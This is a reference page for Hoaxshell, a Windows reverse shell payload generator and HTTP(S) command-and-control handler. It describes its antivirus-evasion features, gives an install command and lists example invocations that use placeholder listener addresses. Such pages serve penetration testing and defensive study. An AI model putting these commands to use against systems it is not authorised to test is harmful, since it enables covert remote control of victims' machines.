Hoaxshell
Hoaxshell is a Windows reverse shell payload generator and handler that abuses the HTTP(S) protocol to establish a beacon-like reverse shell. It generates payloads and handles sessions over standard web protocols.
Description
Hoaxshell provides a method to generate and manage Windows reverse shells by leveraging HTTP(S) for communication, mimicking legitimate web traffic to evade detection. It is particularly useful in penetration testing scenarios where traditional shell protocols might be blocked or monitored.
The tool supports both HTTP and HTTPS modes, with options for custom headers, encrypted sessions, and integration with reverse proxies. This makes it suitable for establishing persistent, low-detection reverse shells on target Windows systems.
Key use cases include generating undetectable payloads for initial access, maintaining command and control (C2) over HTTP(S), and handling shell interactions through a Python-based interface.
How It Works
Hoaxshell operates by generating a Windows payload that establishes a reverse connection to the handler over HTTP(S). The shell session data is transferred via HTTP headers (with customizable names to evade regex-based AV detection). It functions in a beacon-like manner, polling the server at specified frequencies. HTTPS support uses provided certificates for encryption, and options like reverse proxy tunneling (-lt, -ng) enable integration with tools for additional obfuscation.
Installation
sudo apt install hoaxshellFlags
Examples
hoaxshell -s <your_ip>hoaxshell -s <your_ip> -i -H "Authorization"hoaxshell -s <your_ip> -i -H "Authorization" -x "C:\Users\$env:USERNAME\.local\hack.ps1"hoaxshell -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>hoaxshell -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>hoaxshell -lthoaxshell -nghoaxshell -h